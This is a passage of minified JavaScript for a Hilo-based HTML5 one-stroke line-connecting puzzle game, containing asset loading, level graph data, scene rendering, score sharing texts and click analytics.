!
function() {
    window.onload = function() {
        a.init()
    };
    var a = window.Game = {
        width: 0,
        height: 0,
        scale: 1,
        asset: null,
        stage: null,
        ticker: null,
        state: null,
        score: 0,
        user: null,
        bg: null,
        gameRealDrawScene: null,
        gamebeforeDrawScene: null,
        gameHomeScene: null,
        normalScene: null,
        timetrialScene: null,
        init: function() {
            this.user = user,
                a.level.initPath(),
                this.asset = new a.Asset,
                this.asset.on("complete",
                    function() {
                        this.asset.off("complete"),
                            this.initStage()
                    }.bind(this)),
                this.asset.load()
        },
        initStage: function() {
            this.width = 640,
                this.height = 960;
            var a = this;
            a.adaptive();
            var b = this.stage = new Hilo.Stage({
                width: this.width,
                height: this.height,
                scaleX: this.scale,
                scaleY: this.scale
            });
            document.body.appendChild(b.canvas),
                this.ticker = new Hilo.Ticker(60),
                this.ticker.addTick(b),
                this.ticker.start(),
                this.stage.enableDOMEvent(Hilo.event.POINTER_START, !0),
                this.stage.enableDOMEvent(Hilo.event.POINTER_MOVE, !0),
                this.stage.enableDOMEvent(Hilo.event.POINTER_END, !0),
                this.initBackground(),
                this.initScenes(),
                a.centered()
        },
        centered: function() {
            var a = document.getElementById("bg");
            a.style.backgroundSize = "cover"
        },
        adaptive: function() {
            var a = this,
                b = window.innerWidth,
                c = window.innerHeight,
                d = b / this.width,
                e = c / this.height;
            a.scale = d > e ? e : d
        },
        initBackground: function() {
            {
                var a = this.width * this.scale;
                this.height * this.scale
            }
            document.body.insertBefore(Hilo.createElement("div", {
                    id: "bg",
                    style: {
                        position: "absolute",
                        background: "url(./vapp/104/bg.jpg) no-repeat",
                        backgroundSize: "100%,100%",
                        width: a + "px",
                        height: "90%",
                        zIndex: "-1"
                    }
                }), this.stage.canvas),
                this.initShareBtn()
        },
        initScenes: function() {
            var b = this;
            this.gameHomeScene = new a.GameHomeScene({
                    width: this.width,
                    height: this.height,
                    homeImage: this.asset.homeBtn,
                    startImage: this.asset.startt
                }).addTo(this.stage),
                this.gameHomeScene.initBtn();
            var c = b.setShareData(2);

        },
        weixinShare: function() {
            var a = this;

        },
        setShareData: function(a, b, c) {
            var d = this,
                e = parseInt(Date.now() + 1e11 * Math.random());
            d.shareData = {},
                0 == a ? (d.shareData.tContent = "一笔连是通过点击图中的各个点，连成两个之间的线，达到连线效果。将图中所有的线连接起来，游戏通关。", d.shareData.tTitle = "我在一笔连小游戏第" + c + "关中闯关成功，只用了" + b + "秒，大家也来试试吧！", d.shareData.fContent = "我在一笔连小游戏第" + c + "关中闯关成功，只用了" + b + "秒，你也来试试吧！", d.shareData.fTitle = "一笔连小游戏") : 1 == a ? (d.shareData.tContent = "一笔连是通过点击图中的各个点，连成两个之间的线，达到连线效果。将图中所有的线连接起来，游戏通关。", d.shareData.tTitle = "我在一笔连小游戏第" + c + "关中闯关失败了，谁能成功破关呢？", d.shareData.fContent = "我在一笔连小游戏第" + c + "关中闯关失败了，你能成功破关吗？", d.shareData.fTitle = "一笔连小游戏") : (d.shareData.tContent = d.shareData.fContent = "一笔连是通过点击图中的各个点，连成两个之间的线，达到连线效果。将图中所有的线连接起来，游戏通关。", d.shareData.tTitle = d.shareData.fTitle = "一笔连小游戏");
            dp_submitScore(c, a, d.shareData.fContent);
        },
        creatNormalScene: function() {
            var b = this,
                c = a.stage;
            a.normalScene = new a.NormalScene({
                    width: b.width,
                    height: b.height,
                    //image: a.asset.controlBtn,
                    numberGlyphs: a.asset.numberGlyphs
                }).addTo(c),
                a.normalScene.initBtn()
        },
        creatGraphScene: function() {
            var b = this,
                c = a.stage,
                d = a.user.level,
                e = a.level.levelInfo[d];
            setTimeout(function() {
                    a.graphScene = new a.GraphScene({
                            width: b.width,
                            height: 720,
                            image: a.asset.point,
                            y: 100,
                            levelInfo: e
                        }).addTo(c),
                        a.graphScene.initEvent()
                },
                50)
        },
        creatTipScene: function(b, c, d) {
            var e = this,
                f = a.stage,
                g = a.user.level + 1;
            e.setShareData(b, c, g),
                a.tipScene = new a.TipScene({
                    width: e.width,
                    height: e.height,
                    type: b,
                    time: c,
                    text: d,
                    image: a.asset.tip,
                    shareImg: a.asset.share,
                    imgGlyphs: a.asset.textGlyphs,
                    level: g
                }).addTo(f)
        },
        gamePass: function() {
            var b = a.user.level + 1;
            return b >= a.level.levelInfo.length ? (this.creatTipScene(3, "0", "恭喜你丫的,通关了"), !1) : (a.user.setLevel(b), a.user.setGold(a.user.gold + 1), a.normalScene.setGoldText(), a.normalScene.resetTime(), !0)
        },
        gameOver: function() {
            a.normalScene.clearTime(),
                a.normalScene.resetTime()
        },
        initShareBtn: function() {
            var a = "ontouchstart" in window,
                b = a ? "touchend" : "mouseup";   
        }
    }
}(),
function(a) {
    a.Asset = Hilo.Class.create({
        Mixes: Hilo.EventMixin,
        queue: null,
        bg: null,
        ground: null,
        ready: null,
        over: null,
        numberGlyphs: null,
        birdAtlas: null,
        holdback: null,
        load: function() {
            var a = [{
                id: "bg",
                src: "./vapp/104/bg.jpg"
            }, {
                id: "number",
                src: "./vapp/104/number.png"
            }, {
                id: "homeBtn",
                src: "./vapp/104/home.png"
            }, {
                id: "controlBtn",
                src: "./vapp/104/control-btn.png"
            }, {
                id: "tip",
                src: "./vapp/104/tip.png"
            }, {
                id: "point",
                src: "./vapp/104/point.png"
            }, {
                id: "start",
                src: "./vapp/104/start.png"
            }, {
                id: "share",
                src: "./vapp/104/share.png"
            }];
            this.queue = new Hilo.LoadQueue,
                this.queue.add(a),
                this.queue.on("complete", this.onComplete.bind(this)),
                this.queue.start()
        },
        onComplete: function() {
            this.bg = this.queue.get("bg").content,
                this.homeBtn = this.queue.get("homeBtn").content,
                this.controlBtn = this.queue.get("controlBtn").content,
                this.tip = this.queue.get("tip").content,
                this.point = this.queue.get("point").content,
                this.startt = this.queue.get("start").content,
                this.share = this.queue.get("share").content;
            var a = this.queue.get("number").content;
            this.numberGlyphs = {
                    0: {
                        image: a,
                        rect: [0, 0, 60, 91]
                    },
                    1: {
                        image: a,
                        rect: [61, 0, 60, 91]
                    },
                    2: {
                        image: a,
                        rect: [121, 0, 60, 91]
                    },
                    3: {
                        image: a,
                        rect: [191, 0, 60, 91]
                    },
                    4: {
                        image: a,
                        rect: [261, 0, 60, 91]
                    },
                    5: {
                        image: a,
                        rect: [331, 0, 60, 91]
                    },
                    6: {
                        image: a,
                        rect: [401, 0, 60, 91]
                    },
                    7: {
                        image: a,
                        rect: [471, 0, 60, 91]
                    },
                    8: {
                        image: a,
                        rect: [541, 0, 60, 91]
                    },
                    9: {
                        image: a,
                        rect: [611, 0, 60, 91]
                    }
                },
                this.textGlyphs = {
                    0: {
                        image: this.tip,
                        rect: [290, 602, 344, 95]
                    },
                    1: {
                        image: this.tip,
                        rect: [290, 702, 344, 95]
                    },
                    2: {
                        image: this.tip,
                        rect: [290, 802, 344, 95]
                    }
                },
                this.queue.off("complete"),
                this.fire("complete")
        }
    })
}(window.Game),
function(a) {
    var b = a.GraphScene = Hilo.Class.create({
        Extends: Hilo.Container,
        pointW: 48,
        topG: 50,
        marl: 0,
        row: 0,
        pWidth: 70,
        pHeight: 64,
        constructor: function(a) {
            b.superclass.constructor.call(this, a),
                this.properties = a,
                this.initData(),
                this.init(a)
        },
        initData: function() {
            this.pointList = [],
                this.start = !1,
                this.currentPoint = null,
                this.path = [],
                this.drawedPath = [],
                this.timestamp = 0
        },
        init: function(a) {
            var b = this,
                c = b.levelInfo = a.levelInfo,
                d = c.graph,
                e = c.path;
            e = JSON.stringify(e),
                e = JSON.parse(e),
                b.path = e;
            var f = c.blockWidth,
                g = b.row = d[0].length,
                h = g - 1,
                i = b.marl = Math.floor((b.width - f * h) / 2) - 24,
                j = new Hilo.Graphics;
            j.beginPath(),
                j.beginFill(),
                j.lineStyle(20, "#8950a2", "0.2", "round", "square");
            var k = 24;
            marll = i + 24;
            for (var l = "",
                m = 0; m < e.length; m++) {
                var n = e[m].length;
                if (n)
                    for (var o = Math.floor(m / g) * f + k + b.topG, p = Math.floor(m % g) * f + marll, q = 0; n > q; q++) {
                        var r = e[m][q],
                            s = Math.floor(r / g) * f + k + b.topG,
                            t = Math.floor(r % g) * f + marll;
                        l += "M" + p + " " + o + " L" + t + " " + s + " "
                    }
            }
            l += "Z",
                j.drawSVGPath(l),
                j.endFill(),
                b.addChild(j);
            var u = new Hilo.Container({
                id: "graphContainer",
                width: this.width,
                height: this.height
            });
            b.graphContainer = u,
                b.addChild(u),
                b.xDif = i - (b.pWidth - 48) / 2,
                b.yDif = b.topG - (b.pHeight - 42) / 2;
            for (var m = 0; m < d.length; m++)
                for (var q = 0; q < d[m].length; q++) d[m][q] && (star = new Hilo.Bitmap({
                    image: b.properties.image,
                    rect: [48, 0, 48, 42],
                    x: q * f + b.xDif,
                    y: m * f + b.yDif,
                    width: b.pWidth,
                    height: b.pHeight
                }), star.i = m, star.j = q, b.pointList.push(star), b.addChild(star))
        },
        drawPath: function(a, b) {
            var c = this,
                d = c.pWidth / 2,
                e = a.x + d,
                f = a.y + d,
                g = b.x + d,
                h = b.y + d,
                i = new Hilo.Graphics;
            i.beginPath(),
                i.beginFill(),
                i.lineStyle(20, "#f9e34d", "0.2", "round", "round");
            var j = "M" + e + " " + f + " L" + g + " " + h + " Z";
            return i.drawSVGPath(j),
                i.endFill(),
                c.graphContainer.addChild(i),
                i
        },
        drawExistPath: function(a, b) {
            var c = this;
            c.drawPath(c.currentPoint, a),
                c.path[b[0]].splice(b[1], 1);
            var d = {
                start: c.currentPoint,
                end: a
            };
            c.drawedPath.push(d)
        },
        initEvent: function() {
            for (var a = this,
                b = 0; b < a.pointList.length; b++) a.pointList[b].on(Hilo.event.POINTER_END,
                function(b) {
                    b._stopped = !0;
                    var c = {
                        x: this.x,
                        y: this.y,
                        i: this.i,
                        j: this.j
                    };
                    a.responseMoveEvent(c)
                })
        },
        responseMoveEvent: function(a) {
            var b = !1,
                c = this;
            return c.currentPoint ? (b = c.isHasPath(c.currentPoint, a), void(b && (c.drawExistPath(a, b), c.saveDrawedPoint(a), c.responseEndEvent()))) : void c.saveDrawedPoint(a)
        },
        responseEndEvent: function() {
            var b = this;
            b.start = !1;
            var c = (a.stage, a.normalScene.timeCount - a.normalScene.count);
            b.drawedPath.length >= b.levelInfo.pathNum && (a.creatTipScene(0, c + "''"), a.normalScene.clearTime())
        },
        saveDrawedPoint: function(a) {
            var b = this;
            b.removeCurrentPoint(),
                b.currentPoint = a,
                b.drawCurrentPoint(b.currentPoint)
        },
        isHasPath: function(a, b) {
            var c = this,
                d = c.row * a.i + a.j,
                e = c.row * b.i + b.j,
                f = null;
            if (c.path[d] && c.path[d].length) {
                var g = 0,
                    h = c.path[d].some(function(a, b) {
                        return g = b,
                            a == e
                    });
                if (h) return f = [d, g]
            }
            if (c.path[e] && c.path[e].length) {
                var g = 0,
                    h = c.path[e].some(function(a, b) {
                        return g = b,
                            a == d
                    });
                h && (f = [e, g])
            }
            return f
        },
        drawPoint: function(a) {
            {
                var b = this,
                    c = a.x,
                    d = a.y;
                b.pointList
            }
            if (!b.currentPoint) {
                var e = new Hilo.Bitmap({
                    image: b.properties.image,
                    rect: [0, 0, 48, 42],
                    x: c,
                    y: d,
                    width: b.pWidth,
                    height: b.pHeight
                });
                e.i = a.i,
                    e.j = a.j,
                    b.addChild(e),
                    e.on(Hilo.event.POINTER_END,
                        function(a) {
                            a._stopped = !0;
                            var c = {
                                x: this.x,
                                y: this.y,
                                i: this.i,
                                j: this.j
                            };
                            b.responseMoveEvent(c)
                        })
            }
        },
        removeCurrentPoint: function() {
            var a = this;
            a.drawedCurrentPoint && a.removeChild(a.drawedCurrentPoint)
        },
        drawCurrentPoint: function(a) {
            var b = this,
                c = a.x,
                d = a.y,
                e = new Hilo.Bitmap({
                    image: b.properties.image,
                    rect: [96, 0, 48, 42],
                    x: c,
                    y: d,
                    width: b.pWidth,
                    height: b.pHeight
                });
            e.i = a.i,
                e.j = a.j,
                b.addChild(e),
                e.on(Hilo.event.POINTER_END,
                    function(a) {
                        a._stopped = !0;
                        var c = {
                            x: this.x,
                            y: this.y,
                            i: this.i,
                            j: this.j
                        };
                        b.responseMoveEvent(c)
                    }),
                b.drawedCurrentPoint = e
        }
    })
}(window.Game),
function(a) {
    var b = a.GameHomeScene = Hilo.Class.create({
        Extends: Hilo.Container,
        btnW: 390,
        btnH: 98,
        logoH: 325,
        logoW: 396,
        constructor: function(a) {
            b.superclass.constructor.call(this, a),
                this.init(a)
        },
        init: function(a) {
            new Hilo.Bitmap({
                    id: "logo",
                    image: a.homeImage,
                    rect: [0, 0, 396, 325],
                    x: 129,
                    y: 123
                }).addTo(this),
                this.startBtn = new Hilo.Bitmap({
                    id: "startBtn",
                    image: a.startImage,
                    rect: [0, 0, 396, 100],
                    x: 120,
                    y: 568
                }).addTo(this)
        },
        initBtn: function() {
            {
                var b = this;
                a.stage
            }
            b.startBtn.on(Hilo.event.POINTER_END,
                function(c) {
                    c._stopped = !0,
                        a.creatNormalScene(),
                        a.creatGraphScene(),
                        b.visible = !1,
                        _czc.push(["_trackEvent", "点击", "开始游戏按钮"])
                }.bind(b))
        }
    })
}(window.Game),
function(a) {
    a.user = {
        gold: 0,
        bestLevel: 2,
        level: 0,
        setLevel: function(a) {
            this.level = a
        },
        setBestLevel: function(a) {
            this.bestLevel = a
        },
        getLevel: function() {
            return this.level
        },
        setGold: function(a) {
            this.gold = a
        }
    }
}(window),
function(a) {
    a.level = {
        gameLevel: 0,
        levelInfo: [{
            blockWidth: 220,
            pathNum: 7,
            time: 10,
            graph: [
                [1, 0, 1],
                [0, 1, 0],
                [1, 0, 1]
            ],
            path: [
                [4, 6],
                [],
                [4, 8],
                [],
                [6, 8],
                [],
                [8],
                [],
                []
            ]
        }, {
            blockWidth: 180,
            pathNum: 7,
            time: 20,
            graph: [
                [0, 1, 0],
                [1, 0, 1],
                [0, 0, 0],
                [1, 0, 1]
            ],
            path: [
                [],
                [3, 5],
                [],
                [5, 9],
                [],
                [9, 11],
                [],
                [],
                [],
                [11]
            ]
        }, {
            blockWidth: 120,
            pathNum: 6,
            time: 30,
            graph: [
                [0, 0, 1, 0, 0],
                [0, 0, 0, 0, 0],
                [1, 0, 0, 0, 1],
                [0, 0, 0, 0, 0],
                [0, 1, 0, 1, 0]
            ]
        }, {
            blockWidth: 120,
            pathNum: 5,
            time: 30,
            graph: [
                [0, 0, 1, 0, 0],
                [1, 0, 0, 0, 1],
                [0, 0, 0, 0, 0],
                [0, 0, 0, 0, 0],
                [0, 1, 0, 1, 0]
            ]
        }, {
            blockWidth: 250,
            pathNum: 8,
            time: 30,
            graph: [
                [0, 1, 0],
                [1, 0, 1],
                [1, 0, 1]
            ],
            path: [
                [],
                [3, 5],
                [],
                [5, 6, 8],
                [],
                [6, 8],
                [8]
            ]
        }, {
            blockWidth: 150,
            pathNum: 11,
            time: 30,
            graph: [
                [0, 1, 0, 1],
                [1, 0, 1, 0],
                [0, 0, 0, 1],
                [1, 0, 1, 0]
            ]
        }, {
            blockWidth: 120,
            pathNum: 14,
            time: 30,
            graph: [
                [0, 1, 0, 1, 0],
                [0, 0, 0, 0, 0],
                [1, 0, 1, 0, 1],
                [0, 0, 0, 0, 0],
                [0, 1, 0, 1, 0]
            ]
        }, {
            blockWidth: 120,
            pathNum: 10,
            time: 30,
            graph: [
                [0, 1, 0, 1, 0],
                [0, 0, 0, 0, 0],
                [1, 0, 1, 0, 1],
                [0, 0, 0, 0, 0],
                [0, 1, 0, 1, 0]
            ]
        }, {
            blockWidth: 130,
            pathNum: 10,
            time: 40,
            graph: [
                [0, 0, 1, 0, 0],
                [0, 1, 0, 1, 0],
                [0, 0, 1, 0, 0],
                [1, 0, 0, 1, 1]
            ]
        }, {
            blockWidth: 120,
            pathNum: 13,
            time: 40,
            graph: [
                [1, 0, 1, 0, 1],
                [0, 0, 1, 0, 0],
                [0, 1, 0, 1, 0],
                [0, 0, 1, 0, 0],
                [1, 0, 1, 0, 1]
            ]
        }, {
            blockWidth: 130,
            pathNum: 17,
            time: 40,
            graph: [
                [0, 0, 1, 0, 0],
                [0, 1, 0, 1, 0],
                [1, 1, 0, 1, 1],
                [0, 1, 0, 1, 0],
                [0, 0, 1, 0, 0]
            ]
        }, {
            blockWidth: 120,
            pathNum: 15,
            time: 40,
            graph: [
                [0, 0, 1, 0, 0],
                [0, 1, 0, 1, 0],
                [1, 0, 1, 0, 1],
                [0, 1, 0, 1, 0],
                [0, 0, 1, 0, 0]
            ]
        }, {
            blockWidth: 140,
            pathNum: 15,
            time: 40,
            graph: [
                [1, 0, 0, 0, 1],
                [1, 1, 1, 1, 1],
                [0, 1, 0, 1, 0],
                [0, 1, 0, 1, 0]
            ]
        }, {
            blockWidth: 140,
            pathNum: 18,
            time: 50,
            graph: [
                [0, 0, 0, 1, 0],
                [1, 0, 0, 0, 1],
                [1, 1, 1, 0, 1],
                [0, 1, 0, 1, 0],
                [1, 1, 0, 1, 1]
            ]
        }, {
            blockWidth: 100,
            pathNum: 14,
            time: 50,
            graph: [
                [0, 1, 1, 0, 1, 1, 0],
                [1, 0, 0, 1, 0, 0, 1],
                [1, 0, 1, 0, 1, 0, 1],
                [0, 0, 1, 0, 0, 0, 0],
                [0, 0, 0, 1, 0, 0, 0]
            ]
        }, {
            blockWidth: 140,
            pathNum: 16,
            time: 50,
            graph: [
                [0, 0, 1, 0, 0],
                [1, 1, 0, 1, 1],
                [0, 1, 0, 1, 0],
                [0, 0, 1, 0, 0],
                [0, 1, 0, 1, 0]
            ]
        }, {
            blockWidth: 140,
            pathNum: 21,
            time: 50,
            graph: [
                [0, 1, 1, 0],
                [1, 0, 0, 1],
                [0, 1, 1, 0],
                [0, 1, 1, 0],
                [1, 1, 1, 1]
            ]
        }, {
            blockWidth: 140,
            pathNum: 14,
            time: 60,
            graph: [
                [0, 1, 0, 1, 0],
                [0, 0, 0, 0, 0],
                [1, 0, 1, 0, 1],
                [0, 0, 1, 0, 0],
                [0, 1, 0, 1, 0]
            ]
        }, {
            blockWidth: 190,
            pathNum: 20,
            time: 60,
            graph: [
                [1, 1, 1],
                [1, 0, 1],
                [1, 1, 1],
                [1, 1, 1]
            ]
        }, {
            blockWidth: 150,
            pathNum: 15,
            time: 60,
            graph: [
                [0, 0, 1, 0],
                [0, 1, 0, 1],
                [1, 1, 1, 1],
                [1, 0, 1, 0],
                [0, 1, 0, 0]
            ]
        }],
        initPath: function() {
            this.initPath3(2, 23),
                this.initPath4(3, 9),
                this.initPath6(5, 12),
                this.initPath7(6, 21),
                this.initPath8(7, 21),
                this.initPath9(8, 18),
                this.initPath10(9, 22),
                this.initPath11(10, 18),
                this.initPath12(11, 18),
                this.initPath13(12, 22),
                this.initPath14(13, 23),
                this.initPath15(14, 23),
                this.initPath16(15, 17),
                this.initPath17(16, 18),
                this.initPath18(17, 21),
                this.initPath19(18, 10),
                this.initPath20(19, 14)
        },
        initPath20: function(a, b) {
            var c = this.levelInfo[a];
            c.path = new Array(b);
            for (var d = 0; b > d; d++) c.path[d] = [];
            c.path[2] = [5, 7],
                c.path[5] = [7, 9],
                c.path[7] = [9, 11],
                c.path[8] = [9, 12],
                c.path[9] = [10],
                c.path[10] = [11, 12, 14],
                c.path[12] = [14, 17],
                c.path[14] = [17]
        },
        initPath19: function(a, b) {
            var c = this.levelInfo[a];
            c.path = new Array(b);
            for (var d = 0; b > d; d++) c.path[d] = [];
            c.path[0] = [1, 3],
                c.path[1] = [2, 3, 5],
                c.path[2] = [5],
                c.path[3] = [7, 6],
                c.path[5] = [7, 8],
                c.path[6] = [7, 9, 10],
                c.path[7] = [8, 9, 11],
                c.path[8] = [11, 10],
                c.path[9] = [10],
                c.path[10] = [11]
        },
        initPath18: function(a, b) {
            var c = this.levelInfo[a];
            c.path = new Array(b);
            for (var d = 0; b > d; d++) c.path[d] = [];
            c.path[1] = [3, 10, 14],
                c.path[3] = [10, 14],
                c.path[10] = [12, 21],
                c.path[14] = [23],
                c.path[12] = [14, 21, 23],
                c.path[17] = [21, 23],
                c.path[21] = [23]
        },
        initPath17: function(a, b) {
            var c = this.levelInfo[a];
            c.path = new Array(b);
            for (var d = 0; b > d; d++) c.path[d] = [];
            c.path[1] = [2, 4, 9, 10],
                c.path[2] = [10, 7, 9],
                c.path[4] = [9],
                c.path[7] = [10],
                c.path[9] = [10, 13, 14],
                c.path[10] = [14, 13],
                c.path[13] = [16, 17],
                c.path[14] = [18, 19],
                c.path[16] = [17],
                c.path[17] = [18],
                c.path[18] = [19]
        },
        initPath16: function(a, b) {
            var c = this.levelInfo[a];
            c.path = new Array(b);
            for (var d = 0; b > d; d++) c.path[d] = [];
            c.path[2] = [6, 8],
                c.path[5] = [6, 11],
                c.path[6] = [8, 17, 13],
                c.path[8] = [9, 17, 11],
                c.path[9] = [13],
                c.path[11] = [13, 21],
                c.path[13] = [23],
                c.path[17] = [21, 23]
        },
        initPath15: function(a, b) {
            var c = this.levelInfo[a];
            c.path = new Array(b);
            for (var d = 0; b > d; d++) c.path[d] = [];
            c.path[1] = [2, 7],
                c.path[2] = [10],
                c.path[4] = [10, 5],
                c.path[5] = [13, 16],
                c.path[7] = [14],
                c.path[13] = [20],
                c.path[14] = [23],
                c.path[16] = [18],
                c.path[18] = [23],
                c.path[20] = [31],
                c.path[23] = [31]
        },
        initPath14: function(a, b) {
            var c = this.levelInfo[a];
            c.path = new Array(b);
            for (var d = 0; b > d; d++) c.path[d] = [];
            c.path[3] = [12, 9],
                c.path[5] = [10, 11],
                c.path[9] = [12],
                c.path[10] = [11],
                c.path[11] = [12, 16, 18],
                c.path[12] = [14],
                c.path[14] = [18],
                c.path[16] = [18, 20, 21],
                c.path[18] = [23, 24],
                c.path[20] = [21],
                c.path[23] = [24]
        },
        initPath13: function(a, b) {
            var c = this.levelInfo[a];
            c.path = new Array(b);
            for (var d = 0; b > d; d++) c.path[d] = [];
            c.path[0] = [5, 7],
                c.path[4] = [7, 9],
                c.path[5] = [6],
                c.path[6] = [7, 11, 13],
                c.path[7] = [8],
                c.path[8] = [9, 11, 13],
                c.path[11] = [16],
                c.path[13] = [18],
                c.path[16] = [18]
        },
        initPath12: function(a, b) {
            var c = this.levelInfo[a];
            c.path = new Array(b);
            for (var d = 0; b > d; d++) c.path[d] = [];
            c.path[2] = [6, 8],
                c.path[6] = [8, 10, 16, 12],
                c.path[8] = [12, 14, 18],
                c.path[10] = [16],
                c.path[12] = [16, 18],
                c.path[14] = [18],
                c.path[16] = [22],
                c.path[18] = [22]
        },
        initPath11: function(a, b) {
            var c = this.levelInfo[a];
            c.path = new Array(b);
            for (var d = 0; b > d; d++) c.path[d] = [];
            c.path[2] = [6, 8],
                c.path[6] = [8, 10, 11],
                c.path[8] = [13, 14],
                c.path[10] = [11, 16],
                c.path[11] = [13, 16],
                c.path[13] = [14, 18],
                c.path[14] = [18],
                c.path[16] = [18, 22],
                c.path[18] = [22]
        },
        initPath10: function(a, b) {
            var c = this.levelInfo[a];
            c.path = new Array(b);
            for (var d = 0; b > d; d++) c.path[d] = [];
            c.path[0] = [2, 20],
                c.path[2] = [4, 7],
                c.path[4] = [24],
                c.path[7] = [11, 13, 17],
                c.path[11] = [17],
                c.path[13] = [17],
                c.path[17] = [22],
                c.path[20] = [22],
                c.path[22] = [24]
        },
        initPath9: function(a, b) {
            var c = this.levelInfo[a];
            c.path = new Array(b);
            for (var d = 0; b > d; d++) c.path[d] = [];
            c.path[2] = [6, 8],
                c.path[6] = [8, 12, 15],
                c.path[8] = [12, 19],
                c.path[12] = [18],
                c.path[15] = [18],
                c.path[18] = [19]
        },
        initPath8: function(a, b) {
            var c = this.levelInfo[a];
            c.path = new Array(b);
            for (var d = 0; b > d; d++) c.path[d] = [];
            c.path[1] = [3, 10, 12, 21],
                c.path[3] = [14, 23],
                c.path[14] = [23],
                c.path[10] = [21],
                c.path[12] = [21],
                c.path[21] = [23]
        },
        initPath7: function(a, b) {
            var c = this.levelInfo[a];
            c.path = new Array(b);
            for (var d = 0; b > d; d++) c.path[d] = [];
            c.path[1] = [3, 10, 12, 14],
                c.path[3] = [12, 14],
                c.path[10] = [12, 21, 23],
                c.path[12] = [14, 21, 23],
                c.path[14] = [23],
                c.path[21] = [23]
        },
        initPath6: function(a, b) {
            var c = this.levelInfo[a];
            c.path = new Array(b);
            for (var d = 0; b > d; d++) c.path[d] = [];
            c.path[1] = [3, 4],
                c.path[3] = [6, 11],
                c.path[4] = [6, 12, 14],
                c.path[6] = [12, 14],
                c.path[11] = [14],
                c.path[12] = [14]
        },
        initPath4: function(a, b) {
            var c = this.levelInfo[a];
            c.path = new Array(b);
            for (var d = 0; b > d; d++) c.path[d] = [];
            c.path[2] = [21, 23],
                c.path[5] = [9, 23],
                c.path[9] = [21]
        },
        initPath3: function(a, b) {
            var c = this.levelInfo[a];
            c.path = new Array(b);
            for (var d = 0; b > d; d++) c.path[d] = [];
            c.path[2] = [10, 14, 21, 23],
                c.path[10] = [14],
                c.path[21] = [23]
        }
    }
}(window.Game),
function(a) {
    var b = a.TipScene = Hilo.Class.create({
        Extends: Hilo.Container,
        topG: 150,
        leftG: 69,
        tipW: 500,
        tipH: 590,
        btnX: 115,
        btnY: 380,
        constructor: function(a) {
            b.superclass.constructor.call(this, a),
                this.properties = a,
                this.init(a)
        },
        init: function() {
            var a = this,
                b = new Hilo.Bitmap({
                    id: "stopBtn",
                    image: a.properties.image,
                    rect: [0, 0, this.tipW, this.tipH],
                    x: 0,
                    y: 0
                }),
                c = new Hilo.Container({
                    id: "stopBtn",
                    width: this.width,
                    height: this.height,
                    alpha: 0,
                    x: 0,
                    y: 0
                });
            c.setBgFill("#000"),
                a.addChild(c);
            var d = new Hilo.Container({
                    id: "tipContainer",
                    width: this.tipW,
                    height: this.tipH,
                    x: a.leftG,
                    y: a.topG
                }),
                e = new Hilo.Text({
                    id: "level",
                    text: "第" + a.properties.level + "关",
                    width: this.tipW,
                    font: "50px arial",
                    textAlign: "center",
                    color: "#ffcd6f",
                    x: 0,
                    y: 230
                }),
                f = new Hilo.BitmapText({
                    id: "tipText",
                    glyphs: a.properties.imgGlyphs,
                    text: a.properties.type,
                    x: 75,
                    y: 120
                }),
                g = a.shareBtn = new Hilo.Bitmap({
                    id: "shareBtn",
                    image: a.properties.shareImg,
                    rect: [0, 0, 289, 99],
                    width: 289,
                    height: 99,
                    x: 160,
                    y: 480,
                    scaleX: .7,
                    scaleY: .7
                });
            if (0 == a.properties.type) {
                var h = a.nextBtn = new Hilo.Bitmap({
                        id: "nextBtn",
                        image: a.properties.image,
                        rect: [0, 604, 290, 95],
                        width: 290,
                        height: 95,
                        x: a.btnX,
                        y: a.btnY
                    }),
                    i = new Hilo.Text({
                        id: "time",
                        text: "用时：" + a.properties.time,
                        width: this.tipW,
                        font: "50px arial",
                        textAlign: "center",
                        color: "#ffcd6f",
                        x: 0,
                        y: 300
                    });
                d.addChild(b, h, f, e, i, g)
            } else if (1 == a.properties.type) {
                var j = a.aginBtn = new Hilo.Bitmap({
                        id: "aginBtn",
                        image: a.properties.image,
                        rect: [0, 704, 290, 95],
                        width: 290,
                        height: 95,
                        x: a.btnX,
                        y: a.btnY
                    }),
                    k = new Hilo.Text({
                        id: "failText",
                        text: "萌萌哒,再来一次吧!",
                        width: this.tipW,
                        font: "50px arial",
                        textAlign: "center",
                        color: "#ffcd6f",
                        x: 0,
                        y: 300
                    });
                d.addChild(b, j, e, f, k, g)
            } else if (2 == a.properties.type) {
                var l = a.restoreBtn = new Hilo.Bitmap({
                    id: "restore",
                    image: a.properties.image,
                    rect: [0, 804, 290, 95],
                    width: 290,
                    height: 95,
                    x: a.btnX,
                    y: a.btnY
                });
                d.addChild(b, l, e, f, g)
            } else {
                var m = a.reStartBtn = new Hilo.Bitmap({
                        id: "aginBtn",
                        image: a.properties.image,
                        rect: [0, 704, 290, 95],
                        width: 290,
                        height: 95,
                        x: a.btnX,
                        y: a.btnY
                    }),
                    n = new Hilo.Text({
                        id: "level",
                        text: a.properties.text,
                        width: this.tipW,
                        font: "50px arial",
                        textAlign: "center",
                        color: "#ffcd6f",
                        x: 0,
                        y: 230
                    });
                d.addChild(b, m, n, g)
            }
            a.addChild(d),
                a.initBtn()
        },
        initBtn: function() {
            var b = this,
                c = a.stage;
            b.shareBtn.on(Hilo.event.POINTER_END,
                    function(a) {
						var str = user.level + 1;
						try{parent.__4399finishgame(str);}catch(e){}
						location.href = "http://www.6m5m.com";
                    }.bind(this)),
                b.nextBtn ? b.nextBtn.on(Hilo.event.POINTER_END,
                    function(d) {
                        d._stopped = !0,
                            c.removeChild(b),
                            a.setShareData(2),
                            c.removeChild(a.graphScene);
                        var e = a.gamePass();
                        e && (a.creatGraphScene(), a.normalScene.clacTime(), a.normalScene.setTimeInterval()),
                            _czc.push(["_trackEvent", "点击", "下一关按钮"])
                    }.bind(this)) : b.aginBtn ? b.aginBtn.on(Hilo.event.POINTER_END,
                    function(d) {
                        d._stopped = !0,
                            c.removeChild(b),
                            a.setShareData(2),
                            c.removeChild(a.graphScene),
                            a.creatGraphScene(),
                            a.normalScene.clacTime(),
                            a.normalScene.setTimeInterval(),
                            _czc.push(["_trackEvent", "点击", "再来一次按钮"])
                    }.bind(this)) : b.restoreBtn ? b.restoreBtn.on(Hilo.event.POINTER_END,
                    function(d) {
                        d._stopped = !0,
                            c.removeChild(b),
                            a.normalScene.setTimeInterval(),
                            _czc.push(["_trackEvent", "点击", "恢复时间按钮"])
                    }.bind(this)) : b.reStartBtn.on(Hilo.event.POINTER_END,
                    function(d) {
                        d._stopped = !0,
                            a.user.setLevel(0),
                            c.removeChild(b),
                            c.removeChild(a.graphScene),
                            a.creatGraphScene(),
                            a.gameOver(),
                            a.normalScene.clacTime(),
